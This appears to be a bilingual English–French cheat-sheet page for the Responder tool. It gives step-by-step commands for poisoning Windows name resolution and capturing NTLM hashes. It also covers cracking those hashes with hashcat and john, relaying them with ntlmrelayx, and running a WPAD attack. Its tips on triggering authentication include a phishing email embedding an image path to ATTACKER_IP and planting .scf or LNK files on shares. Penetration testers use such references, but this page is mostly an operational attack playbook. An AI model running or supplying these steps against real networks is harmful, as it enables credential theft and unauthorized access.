responder

Empoisonneur LLMNR/NBT-NS/mDNS et outil de capture d'identifiants. Intercepte les diffusions de résolution de noms Windows pour capturer des hashes NTLMv1/v2 et relayer des identifiants pour un accès réseau non autorisé. LLMNR/NBT-NS/mDNS poisoner and credential capture tool. Intercepts Windows name resolution broadcasts to capture NTLMv1/v2 hashes and relay credentials for unauthorized network access.

↗ https://github.com/lgandx/Responder

Overview

Responder poisons LLMNR, NBT-NS, and mDNS queries on Windows networks to capture NTLMv1/v2 challenge-response hashes. When a Windows machine tries to resolve a hostname that doesn’t exist, Responder responds and captures the resulting authentication hash — crackable offline or relayable to other services.

Basic Usage

Start Responder on a network interface

sudo responder -I eth0

Analyze mode (listen without poisoning)

sudo responder -I eth0 -A

With WPAD attack (proxy auto-config phishing)

sudo responder -I eth0 -w

Verbose mode

sudo responder -I eth0 -v

Configuration

# Configuration file: /etc/responder/Responder.conf
# Toggle individual servers on/off:
# SMB = On
# HTTP = On
# HTTPS = On
# SQL = On
# FTP = On
# etc.

# Disable SMB server to allow relay (when using ntlmrelayx)
# In Responder.conf: SMB = Off, HTTP = Off

Hash Capture

Hashes are saved to:

ls /usr/share/responder/logs/

→ SMB-NTLMv2-SSP-192.168.1.100.txt HTTP-NTLMv2-192.168.1.50.txt

View captured hashes

cat /usr/share/responder/logs/*.txt
# Crack NTLMv2 hashes
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
john --format=netntlmv2 hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

NTLM Relay Setup

Step 1: Turn off SMB in Responder.conf (so ntlmrelayx can handle it) Step 2: Start ntlmrelayx targeting non-signing hosts

impacket-ntlmrelayx -tf targets.txt -smb2support

Step 3: Start Responder

sudo responder -I eth0
# Any Windows auth to a non-existent host will relay to targets

WPAD Attack

# WPAD: Web Proxy Auto-Detection
# Windows clients broadcast for "wpad.domain.local" automatically
# Responder answers and serves a WPAD config
# Client authenticates to fetch config — captures hash
sudo responder -I eth0 -w -v

→ All clients looking for WPAD will authenticate to Responder

Trigger Authentication

# Wait for organic traffic, or trigger manually:

# Point to UNC path that doesn't resolve
# \\ + any hostname → triggers LLMNR/NBT-NS lookup

# Send phishing email with UNC path embedded
# <img src="\\ATTACKER_IP\image.jpg">

# Place .scf, .url, or LNK file in accessed file shares
# → Windows auto-resolves the UNC path

Tips

  • Run Responder for 30-60 minutes during active business hours for best results
  • LLMNR/NBT-NS poisoning works on local subnet only — must be on same network
  • NTLMv1 hashes crack much faster than NTLMv2 — check which version is captured
  • Use -A (analyze) mode first to see what traffic exists before poisoning
  • For relay attacks: prefer impacket-ntlmrelayx over cracking when targets don’t require signing
Help / Man page
responder [options]

-I IFACE    Network interface (required)
-A          Analyze mode (no poisoning)
-w          Enable WPAD rogue proxy server
-v          Verbose
-F          Force NTLM authentication
-P          Force proxy auth for WPAD
-b          Basic auth for WPAD (gets cleartext)

Config: /etc/responder/Responder.conf
Logs: /usr/share/responder/logs/

Vue d’ensemble

Responder empoisonne les requêtes LLMNR, NBT-NS et mDNS sur les réseaux Windows pour capturer des hashes de challenge-response NTLMv1/v2. Quand une machine Windows essaie de résoudre un nom d’hôte qui n’existe pas, Responder répond et capture le hash d’authentification résultant : crackable hors-ligne ou relayable vers d’autres services.

Utilisation basique

# Démarrer Responder sur une interface réseau
sudo responder -I eth0

# Mode analyse (écouter sans empoisonner)
sudo responder -I eth0 -A

# Avec l'attaque WPAD (phishing de la configuration automatique de proxy)
sudo responder -I eth0 -w

# Mode verbeux
sudo responder -I eth0 -v

Configuration

# Fichier de configuration : /etc/responder/Responder.conf
# Activer/désactiver les serveurs individuels :
# SMB = On
# HTTP = On
# HTTPS = On
# SQL = On
# FTP = On
# etc.

# Désactiver le serveur SMB pour permettre le relais (en utilisant ntlmrelayx)
# Dans Responder.conf : SMB = Off, HTTP = Off

Capture de hashes

Les hashes sont sauvegardés dans :

ls /usr/share/responder/logs/

→ SMB-NTLMv2-SSP-192.168.1.100.txt HTTP-NTLMv2-192.168.1.50.txt

Afficher les hashes capturés

cat /usr/share/responder/logs/*.txt
# Casser les hashes NTLMv2
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
john --format=netntlmv2 hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Mise en place du relais NTLM

Étape 1 : désactiver SMB dans Responder.conf (pour que ntlmrelayx puisse le gérer). Étape 2 : démarrer ntlmrelayx en ciblant les hôtes sans signature

impacket-ntlmrelayx -tf targets.txt -smb2support

Étape 3 : démarrer Responder

sudo responder -I eth0
# Toute authentification Windows vers un hôte inexistant sera relayée vers les cibles

Attaque WPAD

# WPAD : Web Proxy Auto-Detection
# Les clients Windows diffusent automatiquement une requête pour "wpad.domain.local"
# Responder répond et sert une config WPAD
# Le client s'authentifie pour récupérer la config : le hash est capturé
sudo responder -I eth0 -w -v

→ Tous les clients recherchant le WPAD s’authentifieront auprès de Responder

Déclencher l’authentification

# Attendre du trafic organique, ou déclencher manuellement :

# Pointer vers un chemin UNC qui ne se résout pas
# \\ + n'importe quel nom d'hôte → déclenche une résolution LLMNR/NBT-NS

# Envoyer un email de phishing avec un chemin UNC intégré
# <img src="\\ATTACKER_IP\image.jpg">

# Placer un fichier .scf, .url, ou LNK dans des partages de fichiers accédés
# → Windows résout automatiquement le chemin UNC

Conseils

  • Faire tourner Responder pendant 30 à 60 minutes durant les heures d’activité pour de meilleurs résultats
  • L’empoisonnement LLMNR/NBT-NS ne fonctionne que sur le sous-réseau local : il faut être sur le même réseau
  • Les hashes NTLMv1 se cassent bien plus vite que les NTLMv2 : vérifier quelle version a été capturée
  • Utiliser le mode -A (analyse) d’abord pour voir quel trafic existe avant d’empoisonner
  • Pour les attaques de relais : préférer impacket-ntlmrelayx au cracking quand les cibles ne requièrent pas de signature
Aide / Page de manuel
responder [options]

-I IFACE    Network interface (required)
-A          Analyze mode (no poisoning)
-w          Enable WPAD rogue proxy server
-v          Verbose
-F          Force NTLM authentication
-P          Force proxy auth for WPAD
-b          Basic auth for WPAD (gets cleartext)

Config: /etc/responder/Responder.conf
Logs: /usr/share/responder/logs/